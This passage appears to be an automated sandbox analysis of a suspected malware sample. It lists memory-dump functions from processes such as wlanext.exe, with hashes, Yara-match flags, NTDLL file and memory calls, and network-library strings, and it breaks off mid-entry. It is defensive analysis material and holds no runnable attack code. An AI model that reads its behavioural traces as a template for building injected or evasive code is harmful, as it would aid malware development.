Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
Instruction ID: b9a2edf42df7279d00c6d2fd6e7432e236706e1a86a082a4141c2e19a52186cd
Opcode Fuzzy Hash: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
Instruction Fuzzy Hash: D590026160500402D1407199541C7160055A7D1381F51D111A5018664DC6998B6D76E1

Uniqueness

Uniqueness Score: -1.00%

Function 018D9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
Instruction ID: 53321ca8b4f196fd1101a15e274d4cf6aadd8500fcf81bdacf798d8f1c9c6f3e
Opcode Fuzzy Hash: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
Instruction Fuzzy Hash: D390027120100403D1006199550C7170045A7D1381F51D511A5418668DD69689697161

Uniqueness

Uniqueness Score: -1.00%

Function 018DA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
Instruction ID: a68b9a73b4f58e223c00397e911b9f2647d7fd94f7bde252f19a3a3d2430fd3f
Opcode Fuzzy Hash: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
Instruction Fuzzy Hash: 4590027520504442D50065995808A970045A7D1385F51D511A54186ACDC6948979B161

Uniqueness

Uniqueness Score: -1.00%

Function 018D9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
Instruction ID: 706adae81fac1b69c5ee255f0a8a3f0fc95bd063adde910edbde5ca7b5747946
Opcode Fuzzy Hash: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
Instruction Fuzzy Hash: FF90026120504442D1006599540CA160045A7D1385F51D111A60586A5DC6758969B171

Uniqueness

Uniqueness Score: -1.00%

Function 018D96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
Instruction ID: 7cf915b3097cdc123662fa6e205cee90e65e36a55c402b6ec24c1ef5789a9d81
Opcode Fuzzy Hash: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
Instruction Fuzzy Hash: 6E90027120100842D10061994408B560045A7E1381F51C116A5118764DC655C9697561

Uniqueness

Uniqueness Score: -1.00%

Function 018D9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
Instruction ID: e2a77e1934ce7ececd105d68d442883546b4a4eb8a10d563cd1aa91e7de36d55
Opcode Fuzzy Hash: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
Instruction Fuzzy Hash: B690027160500802D150719944187560045A7D1381F51C111A5018764DC7958B6D76E1

Uniqueness

Uniqueness Score: -1.00%

Function 018D9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
Instruction ID: 8e1f1e5186a7c5c7f42f8fe7f7c89c2d5871950250e4acaace7811e7fde50848
Opcode Fuzzy Hash: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
Instruction Fuzzy Hash: 9590027120504842D14071994408A560055A7D1385F51C111A50587A4DD6658E6DB6A1

Uniqueness

Uniqueness Score: -1.00%

Function 018D9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 70a30b0483fc1539411757e17cdb1b0216f8cd4f454f0515a8d01e42126d9416
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0192FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0192FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E018DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0192fdda
0x0192fde2
0x0192fde5
0x0192fdec
0x0192fdfa
0x0192fdff
0x0192fe0a
0x0192fe0f
0x0192fe17
0x0192fe1e
0x0192fe19
0x0192fe19
0x0192fe19
0x0192fe20
0x0192fe21
0x0192fe22
0x0192fe25
0x0192fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0192FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0192FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0192FE2B

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
Instruction ID: 369415b27afc16e7d6872bb818ceb05f4d4aba4e702e6cd65eacb19685f711be
Opcode Fuzzy Hash: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
Instruction Fuzzy Hash: 5EF0C272240211BBEA212A45DC02E73BB6AEB84B30F150218F628961D5DA62B920D7A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wlanext.exe PID: 7004 Parent PID: 3424 wlanext.exeCOMMON

Executed Functions

Function 032185EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03213BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03213BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0321863D

Strings

.z`, xrefs: 0321862D, 03218638

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 2efcd7304065f89111d13c877a29ceb427e9efad17d243fa6467cca736ea8b1e
Instruction ID: 80593a499b62910f46ea03a1df7e4de9e3aaf2fee2b08088f0413436e046750e
Opcode Fuzzy Hash: 2efcd7304065f89111d13c877a29ceb427e9efad17d243fa6467cca736ea8b1e
Instruction Fuzzy Hash: 3001F2B6215108AFCB48CF98CC84EEB37E9AF8C750F058248FA0C97241C630E850CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032185F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03213BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03213BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0321863D

Strings

.z`, xrefs: 0321862D, 03218638

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 711370f73935f10e035433cd0bfb8ab0902b4ee1ed5a282cfabb77d1ae195b1f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 64F0BDB2210208ABCB48CF88DC94EEB77EDAF8C754F158248BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 032186A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03213D82,5E972F65,FFFFFFFF,03213A41,?,?,03213D82,?,03213A41,FFFFFFFF,5E972F65,03213D82,?,00000000), ref: 032186E5

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: ccc9ef71310f16036db79dd8e49a147f61362a6694e5f6265ca166188ebf4202
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 57F0A4B6210208ABCB14DF89DC94EEB77ADAF8C754F158248BE1D97241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 03218809

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 4a373b7ff2c4e6bb9324d22c3b125b7cc4a25027c7057364205c37905bd64f99
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: BAF015B6210208ABCB14DF89CC80EAB77ADAF88650F118148BE0897241C630F850CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0321871A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03213D60,?,?,03213D60,00000000,FFFFFFFF), ref: 03218745

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: cfd531e69786fed00c3fdb330b8573082e3469d95fc46ef51a8d2c586a147ec5
Instruction ID: 621bf32b6a556965648740de71cd7b6c467de6e02a5acaaad1f46f4b8f2a7fc9
Opcode Fuzzy Hash: cfd531e69786fed00c3fdb330b8573082e3469d95fc46ef51a8d2c586a147ec5
Instruction Fuzzy Hash: EAE08C792002006BD720DBA8CC88EE77B58EF59220F154298BA68AF292C230A680C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 03218720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03213D60,?,?,03213D60,00000000,FFFFFFFF), ref: 03218745

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 608204383b85e9c40e4d268a552a7a3ea3b25208f42335479fb268415562a357
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 06D012752003146BD710EB98CC85F97779CEF44650F154455BA185B242C570F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 03659A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03659A5A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24492cf1e33eeb6a2ce4724947596f78eb82f8c516e1973556d22a27c11e229e
Instruction ID: 449afc2be4d0bf223d542e6bb3ebca36e588d850c45a342b15a924302fa2b75b
Opcode Fuzzy Hash: 24492cf1e33eeb6a2ce4724947596f78eb82f8c516e1973556d22a27c11e229e
Instruction Fuzzy Hash: 3390026131188842D200A96A4C15B07000997D1383F51C115A0144554CCE5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 03659910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365991A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9421de46dfe394fd3b368ebf49d0464bbb844c50061e55106d9fec2a4b0af960
Instruction ID: 4d44fdc2c87e1a37e183f82f2ea82423d057b21f311c3e8b9b98c15630799366
Opcode Fuzzy Hash: 9421de46dfe394fd3b368ebf49d0464bbb844c50061e55106d9fec2a4b0af960
Instruction Fuzzy Hash: 4C9002B130108C02D140B55A4405746000997D1381F51C011A5054554E8B998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 036599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036599AA

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f0cb15e3b09fd5c3f672618d132b0c4db8c2e765fdf24008c5c746b32230bba
Instruction ID: 49a4549093d38c930c01273bc5845e440c16a38e54e7e53ecab57cef99568b3c
Opcode Fuzzy Hash: 7f0cb15e3b09fd5c3f672618d132b0c4db8c2e765fdf24008c5c746b32230bba
Instruction Fuzzy Hash: A19002A134108C42D100A55A4415B060009D7E2381F51C015E1054554D8B59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 03659860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365986A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2603a7faaf3e8ad74d8042e48a53bc1dd3cf5833df1532f97581a35dc15250c
Instruction ID: 64053f38f4e54cd455b5a096e471f76027a2e6ec059380bb6c31b8b43d72ee39
Opcode Fuzzy Hash: d2603a7faaf3e8ad74d8042e48a53bc1dd3cf5833df1532f97581a35dc15250c
Instruction Fuzzy Hash: 2690027130108C13D111A55A4505707000D97D12C1F91C412A0414558D9B968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 03659840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365984A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a90066fa04f5034b0143b4b7ff8d87ce2669bf0e7feee0ceec0d7d2db6a90d31
Instruction ID: d55dfcf6ef61a83b73698f0d2d35c9456123ffaa6455ac0a95f78a9dc0710121
Opcode Fuzzy Hash: a90066fa04f5034b0143b4b7ff8d87ce2669bf0e7feee0ceec0d7d2db6a90d31
Instruction Fuzzy Hash: E69002613420C9525545F55A4405507400AA7E12C1791C012A1404950C8A669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 03659710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365971A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 464804e93a3304c81a1227d9d99b9a429cbdc8f6a69f95877bff9d09c8941fc0
Instruction ID: 3f2f2ee0648f63cbaab480a7b48f063e0df949512af66244b99476d0c903edcc
Opcode Fuzzy Hash: 464804e93a3304c81a1227d9d99b9a429cbdc8f6a69f95877bff9d09c8941fc0
Instruction Fuzzy Hash: 6C90027130108C02D100A99A5409646000997E1381F51D011A5014555ECBA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03659FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03659FEA

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1dfe6c55456177d5cbdffafcbbe65242693a4ff8270aefe2e20ba6d64e9c8316
Instruction ID: 96a8a1e4a52aa3ef0db2c1e6f4c6a6ebee6cbceb1e3e8b9c40ae72d4602d0be5
Opcode Fuzzy Hash: 1dfe6c55456177d5cbdffafcbbe65242693a4ff8270aefe2e20ba6d64e9c8316
Instruction Fuzzy Hash: 829002713111CC02D110A55A8405706000997D2281F51C411A0814558D8BD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 03659780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365978A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3663e0fe1a49dc32b38d94fc7e95dcb15459ebae08c25eba916367fe27899efe
Instruction ID: dfa5b58c2a178220373801ca877ec5e6c626938865a1075074718cda601c2deb
Opcode Fuzzy Hash: 3663e0fe1a49dc32b38d94fc7e95dcb15459ebae08c25eba916367fe27899efe
Instruction Fuzzy Hash: A990026931308802D180B55A540960A000997D2282F91D415A0005558CCE5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 03659660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365966A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5a789a1bb428086382e1dd069118b83e8c2d0b59f99650074aea7c9febf51b7
Instruction ID: 45593fae3bd1cdde5a1b9b9868a3efc13c02ad0c87fa9f7da39c9deb09b0574c
Opcode Fuzzy Hash: e5a789a1bb428086382e1dd069118b83e8c2d0b59f99650074aea7c9febf51b7
Instruction Fuzzy Hash: 5190027130108C02D180B55A440564A000997D2381F91C015A0015654DCF558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 03659650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365965A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3268b36867ebadf4bcae00d84deee6fded80c4fb56a2a1e2f425fd8b2dc4dd97
Instruction ID: d1f6f5d14eeeb5e22db5d69ca793291bd28d03c24dfcf525398b2e6fbec75e6a
Opcode Fuzzy Hash: 3268b36867ebadf4bcae00d84deee6fded80c4fb56a2a1e2f425fd8b2dc4dd97
Instruction Fuzzy Hash: 2C9002713050CC42D140B55A4405A46001997D1385F51C011A0054694D9B658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 036596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036596EA

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0b90565497c49e2d323b8eb4268a83d79c4307669a849a9643d16aee7c725a4
Instruction ID: 23b4cc472d87029fe12b98816050c7f00d23cb17d961ff7aa4107c869006a4d7
Opcode Fuzzy Hash: f0b90565497c49e2d323b8eb4268a83d79c4307669a849a9643d16aee7c725a4
Instruction Fuzzy Hash: E59002713010CC02D110A55A840574A000997D1381F55C411A4414658D8BD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 036596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036596DA

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f37c435001eef0c2b7a29fd0e6b2589acb9ae444b1a18c64df6002fe192f261d
Instruction ID: 52358c9f3777fdd3e3ba835bbaf7204765f10c21ee56f532e89d75ab9cd64727
Opcode Fuzzy Hash: f37c435001eef0c2b7a29fd0e6b2589acb9ae444b1a18c64df6002fe192f261d
Instruction Fuzzy Hash: CD90027130108C42D100A55A4405B46000997E1381F51C016A0114654D8B55C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 03659540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365954A

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c529a223b0c3eadc14c7dad97ee61989c42c5adcfa9a82f193e01806e032009d
Instruction ID: 7035bda8bc9f0479ac03f9f4504b1445dfe3636c7d72c5b9aae12e5d603771b7
Opcode Fuzzy Hash: c529a223b0c3eadc14c7dad97ee61989c42c5adcfa9a82f193e01806e032009d
Instruction Fuzzy Hash: E9900265311088030105E95A0705507004A97D63D1351C021F1005550CDB6188616161

Uniqueness

Uniqueness Score: -1.00%

Function 036595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036595DA

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acc0f1f7c1f716eb36280d7cce708809a28de9108ac70e255d4fcd7e8389efb8
Instruction ID: c17548ba67cecfbf5b1b1150bc732936144d46bd64d20269ad316d9b302a6338
Opcode Fuzzy Hash: acc0f1f7c1f716eb36280d7cce708809a28de9108ac70e255d4fcd7e8389efb8
Instruction Fuzzy Hash: AF9002A1302088034105B55A4415616400E97E1281B51C021E1004590DCA6588917165

Uniqueness

Uniqueness Score: -1.00%

Function 03217310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 032173B8

Strings

wininet.dll, xrefs: 0321736E, 03217377
net.dll, xrefs: 03217381, 03217407, 032173DF, 032173EB, 03217413

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6209a450fb6eca31f2efff5529b39bfa7cf56684ff4a209861beb8cfd36cb1be
Instruction ID: ad0953cb3aaa4e815be4e07ff8e14605be50cced1bd8ff1fef26872d7542200b
Opcode Fuzzy Hash: 6209a450fb6eca31f2efff5529b39bfa7cf56684ff4a209861beb8cfd36cb1be
Instruction Fuzzy Hash: 3B3180B6512700ABC711EF68C8A0FA7B7F8AF98700F04811DFA5A5B241D770B595CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 03217306, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 032173B8

Strings

wininet.dll, xrefs: 0321736E, 03217377
net.dll, xrefs: 03217381, 032173DF, 032173EB

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 008a180120f22a29f4fee2f674847c40af2e372bb2103847642937941cfb52d0
Instruction ID: 2771af378f0e3a3299c3ae42e5019f9c1d42257e4c0ba92ceb142eddaecfcd2d
Opcode Fuzzy Hash: 008a180120f22a29f4fee2f674847c40af2e372bb2103847642937941cfb52d0
Instruction Fuzzy Hash: BD219375511301ABC710EF68C9A0F6BB7F4BF98700F048059FA199B241D771A5A5CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 03217433, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48threadCOMMON

Download Yara Rule

APIs

